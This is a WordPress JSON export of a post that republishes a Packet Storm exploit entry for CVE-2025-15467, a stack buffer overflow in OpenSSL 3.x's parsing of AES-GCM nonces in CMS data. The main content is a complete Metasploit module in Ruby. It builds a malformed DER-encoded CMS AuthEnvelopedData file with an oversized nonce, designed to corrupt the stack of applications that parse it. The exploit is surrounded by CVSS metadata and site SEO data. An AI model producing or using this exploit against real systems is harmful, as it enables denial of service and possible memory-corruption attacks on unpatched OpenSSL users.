{"id":38141,"date":"2026-01-29T10:37:36","date_gmt":"2026-01-29T10:37:36","guid":{"rendered":"http:\/\/localhost\/?p=38141"},"modified":"2026-01-29T10:37:36","modified_gmt":"2026-01-29T10:37:36","slug":"openssl-3x-asn1-aesgcm-nonce-stack-corruption","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38141","title":{"rendered":"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-29T16:30:04&#8243;,&#8221;description&#8221;:&#8221;This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL&#8217;s ASN.1 parser related to improper handling of oversized AES-GCM nonce IV values within&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214573&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-15467&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption via CMS AuthEnvelopedData                                                  |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.openssl-library.org\/                                                                                            |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/214422\/ \\u0026 CVE\u20112025\u201115467\\n    \\n    [+] Summary    :  This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL\u2019s ASN.1 \\n                      parser related to improper handling of oversized AES-GCM nonce (IV) values within AES-GCM-Parameters as defined in RFC 5084. \\n                      The malformed structure is embedded inside a valid-looking AuthEnvelopedData CMS container (RFC 5083), \\n    \\t\\t\\t\\t  allowing the file to pass basic structural validation while triggering memory corruption during decoding.\\n                      The issue affects multiple OpenSSL 3.x branches, including versions 3.0.x prior to 3.0.19, 3.3.x prior to 3.3.6, \\n    \\t\\t\\t\\t  3.4.x prior to 3.4.4, 3.5.x prior to 3.5.5, and 3.6.0 prior to 3.6.1, when parsing untrusted CMS data. \\n    \\t\\t\\t\\t  Successful triggering may result in stack corruption and application crash, with potential security impact depending on the execution context.\\n    \\n    [+] POC :\\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      include Msf::Exploit::FILEFORMAT\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;OpenSSL ASN.1 Parser Stack Corruption Test Generator (CVE-2025-15467)&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module generates a CMS file in DER format that simulates an AuthEnvelopedData \\n            structure according to RFC 5084. It is designed to test for a stack-based buffer \\n            overflow vulnerability during the ASN.1 decoding process, specifically when \\n            handling oversized Nonce (IV) lengths within the AES-GCM-Parameters structure.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [ &#8216;indoushka&#8217; ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;CVE&#8217;, &#8216;2025-15467&#8217;],\\n            [&#8216;RFC&#8217;, &#8216;5084&#8217;],\\n            [&#8216;RFC&#8217;, &#8216;5083&#8217;]\\n          ],\\n          &#8216;Notes&#8217;          =\\u003e {\\n            &#8216;Stability&#8217;   =\\u003e [CRASH_SERVICE_DOWN],\\n            &#8216;Reliability&#8217; =\\u003e [LOW_RELIABILITY]\\n          }\\n        ))\\n    \\n        register_options([\\n          OptString.new(&#8216;FILENAME&#8217;, [ true, &#8216;The output file name.&#8217;, &#8216;openssl_test.cms&#8217;]),\\n          OptInt.new(&#8216;IV_SIZE&#8217;, [ true, &#8216;The size of the malicious Nonce to trigger stack overwrite.&#8217;, 2048])\\n        ])\\n      end\\n      def der_encode(tag, data)\\n        len = data.length\\n        if len \\u003c 128\\n          tag + [len].pack(&#8216;C&#8217;) + data\\n        else\\n          len_str = [len].pack(&#8216;N&#8217;).sub(\/^(\\\\x00)+\/, &#8221;)\\n          tag + [0x80 | len_str.length].pack(&#8216;C&#8217;) + len_str + data\\n        end\\n      end\\n    \\n      def build_cms_structure\\n        iv_len = datastore[&#8216;IV_SIZE&#8217;]\\n        nonce = der_encode(\\&#8221;\\\\x04\\&#8221;, \\&#8221;A\\&#8221; * iv_len)\\n        gcm_params = der_encode(\\&#8221;\\\\x30\\&#8221;, nonce)\\n        aes_gcm_oid = \\&#8221;\\\\x06\\\\x09\\\\x60\\\\x86\\\\x48\\\\x01\\\\x65\\\\x03\\\\x04\\\\x01\\\\x2E\\&#8221;\\n        algo_id = der_encode(\\&#8221;\\\\x30\\&#8221;, aes_gcm_oid + gcm_params)\\n        content_type_data = \\&#8221;\\\\x06\\\\x09\\\\x2A\\\\x86\\\\x48\\\\x86\\\\xF7\\\\x0D\\\\x01\\\\x07\\\\x01\\&#8221;\\n        encrypted_content_info = der_encode(\\&#8221;\\\\x30\\&#8221;, content_type_data + algo_id)\\n        auth_env_body = \\n          \\&#8221;\\\\x02\\\\x01\\\\x00\\&#8221; +           \\n          \\&#8221;\\\\x31\\\\x00\\&#8221; +              \\n          encrypted_content_info +   \\n          \\&#8221;\\\\x04\\\\x10\\&#8221; + (\\&#8221;B\\&#8221; * 16)    \\n        auth_env_oid = \\&#8221;\\\\x06\\\\x0B\\\\x2A\\\\x86\\\\x48\\\\x86\\\\xF7\\\\x0D\\\\x01\\\\x09\\\\x10\\\\x01\\\\x17\\&#8221;\\n        explicit_content = der_encode(\\&#8221;\\\\xA0\\&#8221;, auth_env_body)\\n        der_encode(\\&#8221;\\\\x30\\&#8221;, auth_env_oid + explicit_content)\\n      end\\n    \\n      def run\\n        file_content = build_cms_structure\\n        file_create(file_content)\\n        print_good(\\&#8221;Artifact created successfully for Stack Overwrite testing.\\&#8221;)\\n        print_status(\\&#8221;RFC 5084 compliant GCM parameters used with IV size: #{datastore[&#8216;IV_SIZE&#8217;]}\\&#8221;)\\n      end\\n    end\\n    \\n    Greetings to :============================================================\\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n    ==========================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214573&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214573\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-29T16:30:04&#8243;,&#8221;description&#8221;:&#8221;This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL&#8217;s ASN.1 parser&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-38141","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38141\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-29T16:30:04&#8243;,&#8221;description&#8221;:&#8221;This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL&#8217;s ASN.1 parser...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38141\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-29T10:37:36+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38141#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38141\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573\",\"datePublished\":\"2026-01-29T10:37:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38141\"},\"wordCount\":782,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38141#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38141\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38141\",\"name\":\"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-29T10:37:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38141#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38141\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38141#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38141","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-29T16:30:04&#8243;,&#8221;description&#8221;:&#8221;This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL&#8217;s ASN.1 parser...","og_url":"https:\/\/zero.redgem.net\/?p=38141","og_site_name":"zero redgem","article_published_time":"2026-01-29T10:37:36+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38141#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38141"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573","datePublished":"2026-01-29T10:37:36+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38141"},"wordCount":782,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38141#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38141","url":"https:\/\/zero.redgem.net\/?p=38141","name":"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-29T10:37:36+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38141#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38141"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38141#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption_PACKETSTORM:214573"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38141","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38141"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38141\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38141"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38141"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}